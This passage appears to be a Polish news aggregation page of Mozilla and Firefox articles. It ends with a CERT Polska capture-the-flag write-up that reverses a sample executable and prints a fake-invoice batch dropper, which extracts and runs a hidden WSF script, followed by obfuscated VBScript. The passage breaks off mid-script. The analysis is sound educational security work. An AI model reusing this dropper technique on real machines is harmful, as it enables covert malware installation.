Podczas przeglądania niektórych stron, często jesteśmy śledzeni przez skrypty, które gromadzą dane o tym, gdzie się znajdujemy i co robimy. Skrypty te mogą pożerać Twoje dane, spowalniać działanie przeglądarki i sprawiać, że widzisz reklamy, które na podstawie Twojej historii przeglądania, sugerują Ci co chciałbyś kupić i zobaczyć.

Zauważyliśmy, że przy włączonej opcji prywatnego przeglądania z ochroną śledzenia, Firefox jest znacznie szybszy niż Chrome, nawet w trybie Incognito. Jak bardzo? Czas załadowania Firefox Quantum jest mniejszy o ponad połowę.

 

Potrzebujesz więcej dowodów? Umieściliśmy dwie przeglądarki obok siebie – z włączoną
i z wyłączoną ochroną śledzenia, aby móc zaobserwować postęp ładowania strony www. Rezultaty znajdziesz w poniższym video:

https://youtu.be/saOmYxizNmw

Uważamy, że jest to dość istotne, dlatego oddzieliliśmy ochronę śledzenia od przeglądania prywatnego. Oznacza to, że możesz ustawić opcję ochrony śledzenia w na cały czas, tylko w przeglądarce prywatnej lub w ogóle.

Oto jak to zrobić:

  1. Kliknij przycisk Menu i wybierz Preferencje.
  2. Kliknij przycisk Prywatność & Bezpieczeństwo po lewej stronie i przejdź do sekcji Ochrona śledzenia.

  1. Wybierz jedną z poniższych opcji:
    1. Zawsze: Zachowaj ochronę śledzenia podczas przeglądania.
    2. Tylko w prywatnych oknach: Włącza ochronę śledzenia tylko wtedy, gdy używasz opcji Incognito.
    3. Nigdy: Wyłącza ochronę śledzenia dla wszystkich miejsc.

Ustawiając opcję Ochrony Śledzenia tak, aby zawsze była włączona, nie będziesz wciąż dostawał przypomnień o tym, że jakiś czas temu oglądałeś dany przedmiot, a dodatkowo, wraz z poprawą czasu ładowania strony, możesz szybko i sprawnie surfować między witrynami.

 

 

Centrum prasowe Mozilli, 25 stycznia 2018, 10:54

22 stycznia 2018

Dobre programy

Nowy Firefox na Androida z obsługą progresywnych aplikacji

imageW weekend na serwerach Mozilli pojawił się Firefox 58 w wersji na Windowsa i macOS-a. Przyniósł on istotne zmiany pod maską – dzięki nowemu kompilatorowi WebAssembly, duże aplikacji webowe przyśpieszą w Firefoksie nawet kilkunastokrotnie. Teraz optymalizacja WebAssembly trafia także na Firefoksa na Androida, wraz z kolejnymi ważnymi nowościami. Najważniejszą nowością w Firefoksie 58 jest…
Maciej Olanicki (b.munro), 22 stycznia 2018, 15:22

20 stycznia 2018

Dobre programy

Firefox 58 już jest! Aplikacje w przeglądarce nawet kilkunastokrotnie szybsze

imageW poprzednim dużym wydaniu Firefoksa, wersji 57 Quantum, Mozilla przygotowała ogrom nowości. Było ich na tyle dużo, że można było pozwolić sobie na co najmniej kilka miesięcy rozwoju, który będzie skupiał się na poprawkach i szlifowaniu dotychczasowych osiągnięć. Nic z tego – w naszej bazie znaleźć już możecie Firefoksa 58, który może nie jest już wydaniem rewolucyjnym, ale przynosi ważną nowość…
Maciej Olanicki (b.munro), 20 stycznia 2018, 17:00

19 stycznia 2018

Dobre programy

Internet kłódeczek: Firefox odmówi swoich funkcji niezaszyfrowanym stronom

imageMozilla coraz bardziej odcina się od nieszyfrowanej sieci. W 2015 roku producent Firefoksa ogłosił, że przyjdzie dzień, po którym wszystkie nowe funkcje przeglądarki będą dostępne tylko dla bezpiecznych witryn. Potem przyjdzie zaś czas, by witrynom nie stosującym połączeń po HTTPS zacząć ograniczać dostęp do istniejących funkcji przeglądarki, w szczególności tych związanych z…
Adam Golański (eimi), 19 stycznia 2018, 13:42

18 stycznia 2018

Dobre programy

Nowy Firefox uruchomi gry i aplikacje webowe tak szybko, jakby ładował obrazki

imagePo długich latach zmagań między rozwiązaniami mającymi pozwolić na jak najszybsze uruchamianie aplikacji w przeglądarkach, w 2015 roku wyłonił się standard WebAssembly. Definiuje on binarny format plików .wasm i odpowiadający mu źródłowy format tekstowy kodu przypominającego assembler. Kod taki uruchamiany jest na przenośnej maszynie stosowej, z szybkością bliską szybkości natywnego kodu, w…
Adam Golański (eimi), 18 stycznia 2018, 11:48

15 stycznia 2018

Dobre programy

Firefox wczyta kartę zanim ją klikniesz dzięki mechanizmowi „rozgrzewki”

imageDominacja Google Chrome przeniosła ciężar oczekiwań użytkowników z funkcjonalności na szybkość. Po latach zaniedbań, pod koniec zeszłego roku, do gry wrócił Firefox – implementacja elementów silnika Servo poskutkowało odczuwalnym przez użytkowników przyśpieszeniem i pochwałami, jakich Mozilla nie słyszała od miesięcy. Rewolucja Quantum to jednak dla Firefoksa dopiero pierwszy krok, by (znów)…
Maciej Olanicki (b.munro), 15 stycznia 2018, 17:43

Malwarebytes przez pomyłkę udostępnione jako dodatek do Firefoksa

imageWśród dodatków dostępnych dla Firefoksa pojawiła się eksperymentalna wersja Malwarebytes, co ciekawe dość niespodziewanie i bez dodatkowych informacji na stronie producenta. Polegając wyłącznie na jednozdaniowym opisie w Firefox Add-ons stwierdzić można, że dodatek ma wykrywać i chronić przed szkodliwymi elementami w Sieci, ale szczegóły jego działania nie są jeszcze znane. Po instalacji…
Oskar Ziomek (o.zio), 15 stycznia 2018, 15:25

Jak skutecznie wyłączyć telemetrię w Firefoksie? Jedno kliknięcie to za mało

imageWyłączanie telemetrii (czyli funkcji szpiegowskich) w Windowsie 10 niestety nie ogranicza się do odznaczenia kilku opcji podczas instalacji systemu. By wyciszyć system lepiej jest skorzystać z aplikacji takich jak DoNotSpy – gdzie zobaczymy, że tych ustawień jest naprawdę sporo. Ale myślicie, że taki problem tylko Microsoftu dotyczy? Niestety tak nie jest. Nawet Mozilla, czempion…
Adam Golański (eimi), 15 stycznia 2018, 14:50

14 stycznia 2018

Dobre programy

Firefox z wydłużonym wsparciem będzie łatwiejszy w konfiguracji

imageMozilla zmienia zasady, jakie będą obowiązywać w Firefoksie z wydłużonym wsparciem, z którego korzystają najczęściej organizacje oraz szkoły, ale także indywidualni użytkownicy. Wraz z premierą Firefoksa 60 ESR w maju, pojawi się tu możliwość korzystania z silnika zasad (Policy Engine), dzięki któremu administratorzy będą mogli łatwiej i w większym zakresie personalizować program i integrować go…
Oskar Ziomek (o.zio), 14 stycznia 2018, 14:05

8 stycznia 2018

Dobre programy

Firefox pozwoli jednocześnie blokować wszystkie powiadomienia

imageJest dobra wiadomość dla wszystkich, którzy nie przepadają za ciągłym odrzucaniem propozycji wysyłania powiadomień push oraz udzielania zezwoleń na dostęp do lokalizacji czy mikrofonu podczas korzystania z Internetu. Firefox 59 pozwoli na globalne ich odrzucanie, dzięki wybraniu odpowiedniej opcji w ustawieniach. Możliwość tę można już teraz testować w Firefoksie 59 Nightly, choć stabilne wydanie…
Oskar Ziomek (o.zio), 8 stycznia 2018, 18:14

5 stycznia 2018

Dobre programy

Firefox i Edge już odporne na wykradzenie haseł z pamięci. Z Chrome trzeba poczekać

imageWczoraj dział Public Relations Intela przypominał, że podatności w jego procesorach nie są wcale takie groźne, ponieważ nie dają napastnikom możliwości uszkodzenia, zmodyfikowania czy skasowania danych. Po części jest to prawda – po prostu pozwalają one odczytać z pamięci wrażliwe dane, hasła i klucze kryptograficzne. Nie dość groźne? Sęk w tym, że Intel stwierdził też, że ataki te nie mogą…
Adam Golański (eimi), 5 stycznia 2018, 14:16

3 stycznia 2018

Dobre programy

Która przeglądarka internetowa była najchętniej wybierana w 2017 roku?

imageGdy przyjrzeć się przeglądarkom internetowym, ubiegły rok upłynął przede wszystkim w skupieniu wokół przełomowej wersji Firefoksa, który ze swoim nowym interfejsem i zmianami pod maską miał zrewolucjonizować rynek. Odczucia użytkowników są mieszane, ale bardziej obiektywny obraz całej sytuacji powinny dać statystyki. Przyjrzeliśmy się zatem jak na przestrzeni ostatniego roku zmienił się udział w…
Oskar Ziomek (o.zio), 3 stycznia 2018, 15:35

27 grudnia 2017

Dobre programy

Warto zaktulizować Thunderbirda – Mozilla załatała krytyczną lukę

imageWielu obawiało się, że przyszłość Thunderbirda, który po zawirowaniach finalnie wrócił na łono Mozilli, stoi pod znakiem zapytania. Wygląda jednak na to, że Fundacja wcale nie traktuje klienta poczty po macoszemu – w ostatnim czasie zapowiedziano odpowiednik kwantowej rewolucji (poza nowym interfejsem migracja na WebExtension), a dziś udostępniono ważną aktualizację bezpieczeństwa. Opublikowana…
Maciej Olanicki (b.munro), 27 grudnia 2017, 16:17

22 grudnia 2017

Dobre programy

Firefox celowo spowalnia śledzące nas skrypty, aby szybciej załadować strony

imageOgromny wzrost szybkości ładowania stron internetowych przez Firefoksa 57 nie wziął się tylko z nowego silnika Quantum. Jeden z programistów Mozilli ujawnił właśnie, że w pewnym sensie przeglądarka ta łamie zasadę neutralności sieci. Traktuje pewne zasoby internetowe jako gorsze od innych i opóźnia ich ładowanie. Użytkownicy nie powinni jednak z tego powodu narzekać – te gorsze zasoby to…
Adam Golański (eimi), 22 grudnia 2017, 11:16

20 grudnia 2017

Dobre programy

Thunderbird: nowa wersja klienta pocztowego na miarę rewolucji w Firefoksie?

imagePod koniec 2015 roku zapadła decyzja, że popularny klient poczty Thunderbird nie będzie już rozwijany pod skrzydłami Mozilli. Po ponad roku namysłów i negocjacji, dzięki którym Thunderbird miał znaleźć nowego właściciela, zdecydowano, że projekt jednak pozostanie. Z kolei teraz, dokładniej poznaliśmy jego przyszłość. Wcześniejsze działania Mozilli pozostawiły ślad – teraz przy każdej nowej…
Mateusz Budzeń (Scorpions.B), 20 grudnia 2017, 17:06

18 grudnia 2017

Dobre programy

Mozilla nawet przeprosić nie umie za potajemną instalację reklamy serialu

imageTyle starań programistów, tyle starań marketingu, świetny Firefox 57 ciepło przyjęty przez użytkowników i recenzentów – a tu nagle jeden bezmyślny ruch, po którym społeczność internetowa nie zostawiła na Mozilli suchej nitki. I my nie możemy znaleźć nic na obronę twórców w założeniu wolnej i opensource’owej przeglądarki. Ciche wstrzyknięcie reklamowego rozszerzenia jest czymś, czego prędzej…
Adam Golański (eimi), 18 grudnia 2017, 11:27

16 grudnia 2017

Dobre programy

Firefox 57 ma już ponad miesiąc. Mozilla jest dumna, a co z użytkownikami?

image14 listopada br. rozpoczęła się nowa era dla Mozilli. Oficjalny debiut Firefoxa 57 Quantum uwieńczył łącznie ponad cztery lata starań, mających przynieść do opensource’owej przeglądarki przełomowe technologie renderowania i kompozycji stron. Od strony technicznej Mozilla odniosła spektaktularny sukces – nowy Firefox jest szybszy niż kiedykolwiek wcześniej, jest w wielu testach szybszy…
Adam Golański (eimi), 16 grudnia 2017, 08:34

15 grudnia 2017

Dobre programy

Firefox Focus z dowolną wyszukiwarką i podpowiedziami adresów

imageMozilla zaktualizowała Firefoksa Focus, przeglądarkę mobilną, w której najwyższym priorytetem ma być zapewnienie użytkownikowi bezpieczeństwa i prywatności poprzez blokowanie reklam oraz wszelkich mechanizmów śledzenia. Od początku sposób realizacji tych założeń mógł jednak dziwić, bo w programie brakowało nawet najprostszych, typowych elementów interfejsu, takich jak przeglądania stron na…
Oskar Ziomek (o.zio), 15 grudnia 2017, 13:01

14 grudnia 2017

Centrum prasowe Mozilli

Firefox Focus zapewnia szybki dostęp do stron bez kompromisów w zakresie prywatności

Minął już ponad rok od momentu, gdy uruchomiliśmy Firefox Focus. Odnieśliśmy ogromny sukces, wprowadzając ponad 27 języków, a także zdobywając liczbę ponad miliona pobrań w ciągu pierwszego miesiąca od uruchomienia naszej aplikacji na Androida.

Dzisiaj przedstawiamy nową funkcję: szybszy dostęp do najczęściej odwiedzanych witryn, a także możliwość dodania dowolnej wyszukiwarki do aplikacji Focus. Były to najbardziej pożądane przez naszych użytkowników usprawnienia, które zgodnie z naszymi celami sprawiają, że Focus jest tak dobry.

Wiemy, że nasi użytkownicy chcą mieć wybór i wygodę posiadania ulubionych witryn i wyszukiwarek w zasięgu ręki, ale nie chcą rezygnować z prywatności. Od momentu, w którym stworzyliśmy Focusa, naszym celem było umożliwienie użytkownikom szybkiego dostępu do informacji i stron, jednocześnie zabezpieczając ich dane.

Wszyscy mamy swoje ulubione strony, do których regularnie wracamy – niezależnie od tego, czy dotyczą najnowszych wiadomości ze świata, czy wyników drużyny sportowej, której kibicujemy. Teraz możesz dodawać najczęściej odwiedzane portale do swojej listy w aplikacji. Oznacza to, że tylko Ty możesz zobaczyć adres URL witryny na tej liście. Tak więc, w momencie, gdy chcesz sprawdzić wynik meczu, wystarczy wpisać kilka liter, a autouzupełnianie zakończy pracę za Ciebie.

Nową opcją jest także możliwość dodawania wyszukiwarki z dowolnej strony posiadającej pole do wyszukiwania żądanego hasła. Jeśli chcesz skorzystać z wyszukiwarki, której nie ma na naszej sugerowanej liście wystarczy, że ją dodasz. Na przykład, jeśli chcesz zobaczyć film w ten weekend, ale nie chcesz tracić czasu na kiepską produkcję, możesz sprawdzić wybrany tytuł na rottentomatoes.com. Wiemy, że możliwość wyboru jest ważna dla naszych użytkowników, dlatego ta nowa funkcja umożliwia im skonfigurowanie preferowanego sposobu wyszukiwania w Internecie.

Jednym z powodów, dla których użytkownicy uwielbiają Focusa, jest szybszy czas ładowania dzięki automatycznemu blokowaniu reklam i śledzenia. Szybko przenosi Cię do miejsc, w których chcesz się znaleźć i właśnie to wyróżnia nas na tle innych przeglądarek. Zbudowaliśmy Focusa jako najszybszą i najłatwiejszą wyszukiwarkę stworzoną z myślą o Tobie.

Najnowszą wersję Firefox Focus możesz pobrać na Google Play i App Store.

Centrum prasowe Mozilli, 14 grudnia 2017, 09:21

Rekordowy wzrost Firefox Quantum

Decydując się na początku roku na wcześniejszą premierę Firefox Quantum, wiedzieliśmy, że posiadamy ulepszony produkt. Nie tylko wydawał się szybszy na zewnątrz i na wykresach, ale był mierzalnie szybszy. Dzięki wielokrotnym zmianom, podwoiliśmy prędkość Firefoksa z możliwością zużywania o 30% mniej pamięci niż przeglądarka Chrome.

W niespełna miesiąc, Firefox Quantum został zainstalowany na ponad 170 milionach urządzeń na całym świecie. Dopiero się rozkręcamy, a takie zwroty akcji są bardzo zachęcające.

Oto przykłady najlepszych wskaźników jakie pojawiły się od premiery Firefox Quantum:

  1. Nasze największe wydanie. Firefox Quantum to najszybsza ścieżka do 100 milionów profile i pół miliarda godzin dziennego użytkowania w nowym wydaniu, z nową pamięcią. Produkt jest bezproblemowy i szybko rozrasta się o nowe profile. Miliony użytkowników cały czas dołączają do rodziny Firefox Quantum.
  2. Coraz więcej użytkowników przechodzi z Chroma. Zauważyliśmy 44 procentowy wzrost (w porównaniu do zeszłego roku) w pobieraniu naszej przeglądarki przez osoby korzystające do tej pory z Chrome.
  3. Rośnie również liczba użytkowników mobilnych. Nasze czterordzeniowe aplikacje mobilne są częściej pobierane od momentu wprowadzenia Firefox Quantum na rynek. Firefox na iOS i Androida odnotował 24% wzrost w pobieraniach, a Firefox Focus na Androida i iOS wykazał 48% wzrost w instalacji aplikacji.
  4. Ekosystem dodatków pozostaje silny. Na stronie addons.mozzila.org dodano ponad 1000 gotowych do użycia rozszerzeń od premiery Firefox Quantum.
  5. Zrzuty ekranu to prawdziwy hit. Zauważamy bardzo wzmożone i wczesne zainteresowanie. Użytkownicy wykonali ponad 30 milionów zrzutów ekranu, od momentu wprowadzenia tej funkcji na rynek pod koniec września.
  6. Developer Support dla Firefox Quantum: zwiększona prędkość i stabilność przeglądarki, a także lepsza jakość narzędzi programistycznych, daje programistom więcej powodów do spróbowania i kontynuacji korzystania z narzędzi Firefox dla programistów. Od 26 września, wydania programistycznej wersji Firefox Quantum, zauważyliśmy 10% wzrost w codziennym korzystaniu z narzędzi programistycznych i 53% wzrost pobierania tej edycji.Oto co świat myśli na temat Firefox Quantum:
  7. W Social Mediach wciąż jest głośno. Przyjemnie było czytać wypowiedzi nowych użytkowników przeglądarki, a jeszcze przyjemniej jest zauważać znaczące, pozytywne wypowiedzi na Facebooku, Twitterze, Reddit, Tumblr, YouTubie i na blogach.
  8. Nasze reklamy. Zastosowaliśmy nietypowe podejście w kwestii marketingowej nowej przeglądarki Firefoksa. Skupiliśmy się na emocjach (a nawet na dźwięku!), jakie wywołuje korzystanie z naszej nowej, szybkiej przeglądarki. To wszystko pojawiło się w spotach telewizyjnych i promowanych wideo z naszym „Wait Face” i teledyskiem Reggiego Wattsa. Oba wideo miały ponad pół miliarda wyświetleń, a jedna trzecia obejrzała filmy od początku do końca.
  9. Firefox w wiadomościach. Napisano ogromną ilość pozytywnych artykułów o nowej przeglądarce Firefoksa. Widzieliśmy setki nagłówków z całego świata m.in.: Wired, El Pais, Usbek & Rica.

Jesteśmy niezmiernie poruszeni ilością pozytywnych reakcji od czasu premiery. Będziemy nadal przyglądać się liczbom i wrócimy do Was z aktualizacją po Nowym Roku!

 

Centrum prasowe Mozilli, 14 grudnia 2017, 09:18

13 grudnia 2017

Dobre programy

CCleaner 5.38 dokładniej sprząta po Chromie i lepiej działa z Edgem

imagePoprzednia wersja CCleanera nauczyła się lepiej sprzątać po Firefoksie i Microsoft Edge, zaś wydana właśnie nowa wersja oznaczona numerem 5.38 bierze się za przeglądarkę Google Chrome, dorzucając niewielką nowość dla użytkowników Edge’a. Ponadto wprowadza jeszcze kilka małych usprawnień. Dostępny jest już CCleaner w wersji 5.38 i jak podają twórcy, ma teraz działać stabilniej. Aktualizacja…
Mateusz Budzeń (Scorpions.B), 13 grudnia 2017, 14:05

Strona rozszerzeń do Firefoksa tonie w spamie i marnych dodatkach

imageNa stronie Mozilli przeznaczonej dla dodatków do Firefoksa (AMO) mamy do czynienia z nietypowym zjawiskiem – pojawia się na niej masa rozszerzeń, które w rzeczywistości są tylko spamem. Linki do kolejnych dodatków mają zachęcać użytkowników do klikania w odnośniki w opisach i pobierania filmów lub seriali, zaś z rozszerzaniem możliwości Firefoksa nie mają wiele wspólnego. Z punktu widzenia…
Oskar Ziomek (o.zio), 13 grudnia 2017, 13:32

11 grudnia 2017

Dobre programy

SiteDelta Highlight i Watch: rozszerzenia wskażą zmiany na stronach

image SiteDelta Watch i SiteDelta Highlight to rozszerzenia dla Chrome'a i Firefoksa, które przydadzą się przy monitorowaniu zmian na stronach. Choć działają podobnie, przydadzą się w różnych scenariuszach – SiteDelta Watch monitoruje zmiany na stronach automatycznie, zaś SiteDelta Highlight dokładniej analizuje strony i wskazuje zmiany, ale wymaga ręcznego załadowania każdej z nich. SiteDelta…
Anna Rymsza (Xyrcon), 11 grudnia 2017, 20:08

1 grudnia 2017

Dobre programy

Porażka NoScript jako WebExtension – dodatek zbiera negatywne opinie

imageW ubiegłym tygodniu informowaliśmy o ostatecznym wydaniu popularnego rozszerzenia NoScript jako WebExtension – wersji przeznaczonej dla Firefoksa 57 Quantum. Już wtedy wiadomo było, że dodatek ma być dalej rozwijany, bo nie odwzorowuje jeszcze pełnej funkcjonalności poprzednika, ale wymagania użytkowników przerosły możliwości twórców i od kilku dni rozszerzenie zbiera niemal wyłącznie negatywne…
Oskar Ziomek (o.zio), 1 grudnia 2017, 18:35

Firefox 58 Beta dla Androida: FLAC i skróty do Progressive Web Apps

imageDo użytkowników Androida korzystających z edycji Beta przeglądarki Firefox, trafia jej najnowsza, 58 wersja. Przynosi kilka istotnych zmian, w tym możliwość przypinania skrótów do aplikacji progresywnych na pulpicie, dzięki czemu jeszcze bardziej zatarta zostanie różnica pomiędzy pełną aplikacją, a mobilną wersją strony. Poza tym pojawiła się także obsługa formatu FLAC oraz nowe języki. Od…
Oskar Ziomek (o.zio), 1 grudnia 2017, 11:38

30 listopada 2017

Dobre programy

Mozilla właśnie oddała najlepsze techniki rozpoznawania mowy w ręce programistów

imageAlexa, Cortana, Siri, ten google’owy asystent, który nie ma żadnego dobrego imienia – patrząc na to wszystko, co stało się przez ostatnie lata w dziedzinie maszynowego przetwarzania ludzkiej mowy, można by było pomyśleć, że żyjemy już w czasach, w których z komputerami rozmawia się jak w Star Treku. A po pomyśleniu sięgnąć po klawiaturę i myszkę, by pisać, klikać i patrzeć na efekty. Choć…
Adam Golański (eimi), 30 listopada 2017, 22:06

Centrum prasowe Mozilli

Common Voice – Mozilla udostępnia drugi co do wielkości zbiór danych głosowych

Od startu inicjatywy Common Voice zebraliśmy setki tysięcy próbek głosu za pośrednictwem naszej strony internetowej i aplikacji iOS. Dziś udostępniamy pierwszą wersję tej kolekcji głosów.

Od początku Mozilla opierała się na kreatywności, współczuciu i zaradności ludzi na całym świecie, którzy pomagali nam budować i promować sieć jako globalne zasoby publiczne dostępne dla wszystkich. Stanowiło to podstawę naszej eksperymentalnej pracy w dziedzinie systemów uczących się i rozpoznawania mowy oraz budowania obszernej bazy wysokiej jakości danych głosowych za pomocą Common Voice.

Zbiór ten zawiera blisko 400 000 nagrań od 20 000 różnych osób, co daje około 500 godzin wypowiedzi. Do tej pory jest to drugi co do wielkości ogólnodostępny zestaw danych głosowych, o którym wiemy, a ludzie na całym świecie cały czas dodają i sprawdzają nowe próbki!

Możesz pobrać dane już teraz!

Sami przekonaliśmy się jak trudno jest znaleźć publicznie dostępne dane do naszej pracy w zakresie technologii mowy, dlatego udostępniamy linki do wszystkich innych znanych nam źródeł. Chcemy dalej rozwijać naszą stronę tak, aby stała się centralną bazą danych głosowych.

Patrząc na dzisiejszy ekosystem głosu, widzimy wielu programistów, twórców, start-upowców i badaczy, którzy chcą eksperymentować i budować technologie głosowe. Większość z nas ma jednak dostęp jedynie do dość ograniczonego zbioru danych głosowych. Jest to niezbędny element tworzenia wysokiej jakości silników rozpoznawania mowy. Te dane głosowe mogą kosztować dziesiątki tysięcy dolarów, a ich skala jest niewystarczająca do opracowania rozwiązań w zakresie rozpoznawania mowy na poziomie oczekiwanym przez ludzi. Dostarczając ten nowy zbiór danych publicznych, chcemy pomóc przezwyciężyć te bariery i ułatwić tworzenie nowych, lepszych systemów rozpoznawania mowy (takich jak nasza własna funkcja Deep Speech). Zaczęliśmy od języka angielskiego, ale wkrótce będziemy wspierać każdy język. Mamy nadzieję, że dzięki naszej równoległej pracy nad mechanizmem speech-to-text, uda nam się udostępnić technologię mowy większej liczbie osób, które będą mogły wprowadzać innowacje i konkurować z większymi graczami.

Czy jesteś zainteresowany naszym ogólnodostępnym projektem rozpoznawania mowy „Deep Speech” oraz wykorzystaniem zasobów Common Voice do tworzenia lepszych produktów?  Reuben Morais z zespołu Mozilla Machine Learning właśnie opublikował artykuł pt. „Journey to <10% Word Error Rate”. Stanowi on ciekawe podsumowanie wyzwań i wniosków zebranych podczas pracy nad stworzeniem pierwszego modelu mechanizmu rozpoznawania mowy open source, który został dziś opublikowany w repozytorium github!

W dalszym ciągu przyjmujemy chętnych do pracy nad projektem Common Voice. Prosimy o przesyłanie pomysłów jak możemy współpracować, tak abyśmy wiedzieli, w jaki sposób korzystacie z danych. Czekamy również na sugestie, w jaki sposób ten projekt może być jeszcze bardziej przydatny.

Chcielibyśmy podziękować Mycroft, SNIPS, Bangor University, LibriSpeech, VoxForge, TED-LIUM, Tatoeba.org, Mythic, SAP oraz wszystkim współtwórcom z github. Nie udałoby nam się bez Was!

Stale dążymy do poprawy jakości naszego zbioru danych. Wejdź na stronę internetową Common Voice i pomóż nam zweryfikować nagrania, co jest równie ważne jak przekazywanie głosu!

Centrum prasowe Mozilli, 30 listopada 2017, 07:27

28 listopada 2017

CERT Polska

Rozwiązania zadań z konkursu Capture The Flag w ramach ECSM 2017

Na koniec października, czyli wybranego przez Komisję Europejską oraz ENISA miesiąca poświęconego bezpieczeństwu teleinformatycznemu, zorganizowaliśmy mały konkurs typu Capture The Flag.

Na zakończenie konkursu mamy przyjemność zaprezentować zwycięzców:

Gratulujemy zwycięzcom, a wszystkim dziękujemy za udział w konkursie!

Chętni nadal mogą rozwiązać zadania na stronie ecsm2017.cert.pl.


Poniżej odnośniki do opisów rozwiązań poszczególnych zadań:


Czerwony Exploit

Zadanie

Dostajemy plik cyber.zip, w którym znajduje się plik cyber.exe. Nie pokazuje niczego oczywistego po uruchomieniu, więc jedyne co można z nim zrobić, to załadować do deasemblera (względnie dekompilatora).

Zaczynamy więc:

Program jest na tyle miły, że wita się z nami, wywołuje jakąś funkcję i żegna się.

Zobaczmy więc co znajduje się w tej funkcji.

Może nie być widać na pierwszy rzut oka, ale pętla z prawej strony to po prostu operacja xor z 0x1F – czyli cały ten kod sprowadza się do pobrania nazwy użytkownika i sprawdzenia czy po operacji xor jest równa nazwie z lewej strony. Jeśli tak, to wywoływana jest kolejna funkcja, jeśli nie, to program kończy działanie.

Łatwo odzyskać z tego wymaganą nazwę użytkownika – jest to RedaktorCyberobrona.

Idźmy więc do kolejnej funkcji:

Metoda analogiczna jak poprzednio – tylko zamiast nazwy użytkownika jest sprawdzana nazwa komputera, i zamiast operacji xor z 0x1F jest operacja sub 0x2.

Tym razem deszyfruje się ona do: CYBEROBRONA24.

Ponownie, w razie sukcesu wywoływana jest kolejna funkcja, więc popatrzmy na nią:

Trochę podobna do poprzednich funkcji, ale jednak inna.

Zaczyna się od długiej funkcji sub_40181A, której analizę pominiemy – ze stałych w niej zawartych można się domyślić, że wykonuje zapytanie do infiltrator na serwerze „C&C”, a trochę reversowania mówi, że port to 6012.

Następnie pobierana jest nazwa użytkownika i poddawana operacji xor z 0x99 – ale tym razem program nie sprawdza czy wynik jest poprawny! Zamiast tego wywołuje funkcję sub_4019F6 z nazwą użytkownika (po operacji xor), oraz pobranymi danymi.

Co kryje się w tej funkcji?

Jakaś metoda szyfrowania (tak naprawdę – kolejna operacja xor).
Nie ma to jednak znaczenia, skoro możemy podstawić po prostu znaną nam poprawną nazwę użytkownika i odszyfrować dane poprawnie.

Następnie w programie dane są parsowane, ale to nie jest wcale konieczne w przypadku rozwiązywania zadania – łatwo w zdeszyfrowanych danych spostrzec ciekawy fragment:

ecsm{czerwony_cyberatak_z_czerwonego_cyberwschodu}

Fałszywa faktura

Etap 1: Plik BAT

Na stronie zadania znajduje się link do rzekomej faktury. W spakowanym pliku w formacie ZIP można znaleźć plik wykonywalny Invoice_EC2455321.bat. Według opisu zadania: rolą tego pliku jest pobranie złośliwego oprogramowania na komputer ofiary. Udaje się to jednak tylko w przypadku konkretnego użytkownika.

Po otwarciu pliku .bat widzimy skrypt Windows Batch File, który po poleceniu exit zawiera skrypt w innym formacie.

@echo off
setlocal enableDelayedExpansion
set counter=1
set outpath="%temp%\ecsm"
set outfile="%temp%\ecsm\enjoy.wsf"
mkdir %outpath% 2>nul
set infile=%~n0%~x0
for /f "tokens=1 delims=:" %%a in ('findstr /n /b exit %infile%') do (
    set /A startline=%%a
    goto ok
)
:ok
more +!startline! %infile% > %outfile%
pushd %outpath% & cscript enjoy.wsf & popd
exit /b
''; /* <!--
Dim hope: Set hope = Nothing: Dim weakened: [...]

Na samym początku tworzony jest folder ecsm w TEMP. Ustawiane są też odpowiednie ścieżki w zmiennych środowiskowych m.in. outpath wskazujący na plik enjoy.wsf w utworzonym folderze i infile wskazujący na aktualnie wykonywany skrypt – %~n0%~x0. W Batchu %~n0 zwraca nazwę pliku bez ścieżki i rozszerzenia, a %~x0 zwraca rozszerzenie.

Następnie znajdowana jest linia zawierająca exit. Przy pomocy polecenia more cała zawartość znajdująca się za poleceniem exit kopiowana jest do pliku enjoy.wsf. Ostatecznie skopiowany plik WSF uruchamiany jest z użyciem cscript.

Etap 2: Plik WSF

Windows Script File (WSF) jest jednym z licznych formatów wspieranych przez silnik Windows Script Host. Pozwala na budowanie złożonych skryptów wykorzystujących kilka języków skryptowych (m.in. JScript i VBScript). Pliki WSF opisywane są przy użyciu XML. Używając różnego rodzaju znaczników możemy podzielić skrypty na zadania (<job>), importować zewnętrzne stałe (<reference>), opisywać argumenty wywołania (<runtime>) itp.

Na tym etapie wykorzystane zostały dwie cechy formatu:

Skrypty w poszczególnych językach ładowane są na samym końcu opisywanego pliku:

''; /* --> <package> <job id="RickRolled">
' <script language="VBScript" src="./enjoy.wsf"> </script>
' <script language="JScript" src="./enjoy.wsf"> </script> </job> </package>
' */

Znaczniki zawarte w WSF ładują ten sam plik kolejno jako VBScript i jako JScript. Co ważne: w tak załadowanym skrypcie – obiekty pochodzące z wykonania pliku VBScript będą widoczne dla JScript (oba skrypty współdzielą global scope co pozwala wykorzystywać właściwości jednego języka w innym).

Do załadowania obu skryptów w ten sposób wymagana jest przewidywalna nazwa pliku – taką nazwę zapewnia etap 1.

Etap 3: Skrypt VBS

Dim hope: Set hope = Nothing
Dim weakened: Set weakened = Nothing
Dim innocent: Set innocent = Nothing
Function silence(plValue, pbBits)
    silence = plValue \ (2 ^ pbBits)
End Function

Dim reason: reason = "MSXML2.XMLHTTP"

Class Clever
    Private Sub Class_Initialize()
        ' Otwarcie pliku enjoy.wsf przy tworzeniu obiektu Clever
        If innocent Is Nothing Then
            Set innocent = img.src
            innocent.Type = 1
            innocent.Open
            innocent.LoadFromFile("./enjoy.wsf")
        End If
    End Sub
    Private Sub Class_Terminate():
        ' Destruktor dla obiektu Clever, ktory ustawia zmienna hope na wartosc zwracana z hate()
        ' Przy destrukcji: hope = hope ROL 1
        hope = hate()
    End Sub
    Private Sub Class_Destroy(): hope = ( hate() * 2 ) Xor &HFFFFFFFF: End Sub
    Private Sub Class_Finish(): hope = whispering("love"): End Sub
End Class

Function whispering(justice):
    ' whispering(justice) -> crc32(data)
    Dim joy, honest, sharing, l, valuable
    joy = "&h0,&h77073096,&hEE0E612C,&h990951BA,&h076DC419,&h706AF48F,&hE963A535,&h9E6495A3,&h0EDB8832,&h79DCB8A4,&hE0D5E91E,&h97D2D988,&h09B64C2B,&h7EB17CBD,&hE7B82D07,&h90BF1D91,&h1DB71064,&h6AB020F2,&hF3B97148,&h84BE41DE,&h1ADAD47D,&h6DDDE4EB,&hF4D4B551,&h83D385C7,&h136C9856,&h646BA8C0,&hFD62F97A,&h8A65C9EC,&h14015C4F,&h63066CD9,&hFA0F3D63,&h8D080DF5,&h3B6E20C8,&h4C69105E,&hD56041E4,&hA2677172,&h3C03E4D1,&h4B04D447," _
